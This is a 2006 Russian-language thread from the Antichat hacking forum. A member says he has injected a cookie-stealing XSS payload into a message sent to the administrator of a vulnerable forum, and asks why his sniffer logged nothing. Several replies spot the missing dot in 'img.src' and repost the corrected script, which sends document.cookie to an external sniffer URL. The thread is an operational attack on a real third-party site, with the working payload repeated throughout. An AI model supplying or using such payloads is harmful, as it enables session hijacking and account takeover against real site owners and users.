ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Вопрос по организации XSS атаки, на уязвимом форуме..
  #1  
Старый 09.07.2006, 10:09
Аватар для a1nt
a1nt
Участник форума
Регистрация: 16.12.2005
Сообщений: 146
Провел на форуме:
573934

Репутация: 114
По умолчанию Вопрос по организации XSS атаки, на уязвимом форуме..

Нашел уязвимый форум, где можно вставить
Код:
<script></script>
. Чтобы забрать cookies админа отправил ему сообщение
Код:
<script>img = new Image(); img src = "http://antichat.org/s/a1nt.gif?"+document.cookie;</script>
Где картинк - сниффер на antichat.org. Но когда я написал этот код в html и открыл браузером - моя загрузка в лог добавлена не была, только когда напрямую обращаюсь к http://antichat.org/s/a1nt.gif, мой IP добавляется. В чем же все-таки проблема и стоит ли мне ждать админских cookies?
 
Ответить с цитированием

  #2  
Старый 09.07.2006, 11:49
Аватар для Azazel
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900

Репутация: 561


По умолчанию

Посмотри что у тебя в сорсе сообщения. Может фильтруются символы какие-нибудь.
__________________
Full DNS report
 
Ответить с цитированием

  #3  
Старый 09.07.2006, 19:40
Аватар для a1nt
a1nt
Участник форума
Регистрация: 16.12.2005
Сообщений: 146
Провел на форуме:
573934

Репутация: 114
По умолчанию

В том то и дело, что уязвимость проверенная. Я не понимаю почему конструкция
Код:
<script>img = new Image(); img src = "http://antichat.org/s/a1nt.gif?"+document.cookie;</script>
Не работает на моем компьютере.
 
Ответить с цитированием

  #4  
Старый 09.07.2006, 20:07
Аватар для FQziT
FQziT
Постоянный
Регистрация: 03.11.2005
Сообщений: 591
Провел на форуме:
5605982

Репутация: 523


По умолчанию

Цитата:
<script>img = new Image(); img src = "http://antichat.org/s/a1nt.gif?"+document.cookie;</script>
Цитата:
<script>img = new Image(); img.src = "http://antichat.org/s/a1nt.gif?"+document.cookie;</script>
Найди отличие
 
Ответить с цитированием

  #5  
Старый 09.07.2006, 20:19
Аватар для Dracula4ever
Dracula4ever
Постоянный
Регистрация: 08.05.2006
Сообщений: 559
Провел на форуме:
1593567

Репутация: 354


Отправить сообщение для Dracula4ever с помощью ICQ Отправить сообщение для Dracula4ever с помощью AIM Отправить сообщение для Dracula4ever с помощью Yahoo
По умолчанию

Цитата:
Сообщение от FQziT  
Найди отличие
я помогу.

Цитата:
<script>img = new Image(); img src = "http://antichat.org/s/a1nt.gif?"+document.cookie;</script>
Цитата:
<script>img = new Image(); img.src = "http://antichat.org/s/a1nt.gif?"+document.cookie;</script>
 
Ответить с цитированием

  #6  
Старый 09.07.2006, 20:21
Аватар для D1mOn
D1mOn
Постоянный
Регистрация: 02.10.2005
Сообщений: 490
Провел на форуме:
2333839

Репутация: 212
По умолчанию

Цитата:
<script>img = new Image(); img.src = "http://antichat.org/s/a1nt.gif?"+document.cookie;</script>
точку забыл!
 
Ответить с цитированием

  #7  
Старый 09.07.2006, 20:29
Аватар для podkashey
podkashey
Познавший АНТИЧАТ
Регистрация: 18.06.2005
Сообщений: 1,004
Провел на форуме:
2821162

Репутация: 1320


По умолчанию

a1nt, это приватная инфа - в паблике нету...
 
Ответить с цитированием

  #8  
Старый 09.07.2006, 20:34
Аватар для FQziT
FQziT
Постоянный
Регистрация: 03.11.2005
Сообщений: 591
Провел на форуме:
5605982

Репутация: 523


По умолчанию

dracula4ever, D1mOn: Пять за сообразительность :-)
 
Ответить с цитированием

  #9  
Старый 09.07.2006, 20:58
Аватар для a1nt
a1nt
Участник форума
Регистрация: 16.12.2005
Сообщений: 146
Провел на форуме:
573934

Репутация: 114
По умолчанию

Епс!! Надо ж так... Ухххх..... Спасибо что ткнули носом, извините за ламеризм.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Proxy FAQ foreva Чужие Статьи 12 04.01.2008 12:15
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25
Вопрос по применению XSS на форуме ExBB 1.9.1 TweakeR Форумы 9 28.02.2006 18:24
ЕсТь ВоПрос Guma Чаты 4 26.10.2005 21:48
Вопрос про проведению атаки класса XSS, в форуме Invison Power Board badboy Форумы 10 02.06.2005 22:28



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ